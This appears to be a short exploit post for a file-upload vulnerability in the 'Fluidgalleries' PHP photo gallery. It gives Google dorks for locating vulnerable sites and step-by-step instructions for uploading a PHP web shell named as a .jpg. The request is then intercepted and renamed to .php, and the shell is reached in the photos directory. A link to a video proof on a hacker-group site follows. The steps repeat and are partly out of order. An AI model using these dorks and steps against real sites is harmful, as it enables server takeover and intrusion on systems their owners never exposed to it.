Fluidgalleries Photo Upload Remote - File Upload Vulnerability
Dorks:
Use Live HTTP Headers... Then go to here:
1.Click the Choose File button Then select a file [shell.php.jpg]
2.Then click on the upload button.
3. Now using Live HTTP Headers uploaded files to PHP change [shell.php]
4. Then go to this page :
Example: 1NEXUS.php
.. Video proof exploits :
inurl:"fluidgalleries/dat/info.dat"
inurl:"/fluidgalleries/php/"Exploit:
http://localhost/[path]/fluidgalleries/php/photo-upload.php*Use Firefox...
Use Live HTTP Headers... Then go to here:
http://localhost/[path]/fluidgalleries/php/photo-upload.php
1.Click the Choose File button Then select a file [shell.php.jpg]
2.Then click on the upload button.
3. Now using Live HTTP Headers uploaded files to PHP change [shell.php]
4. Then go to this page :
http://localhost/[path]/fluidgalleries/photos/ [Random number+shell.php]
Example: 1NEXUS.php
.. Video proof exploits :
http://m-h-a-c-k-e-r.persiangig.com/Black.Idc-Team/fluidgalleriesExploit/fluidgalleriesExploit.swf
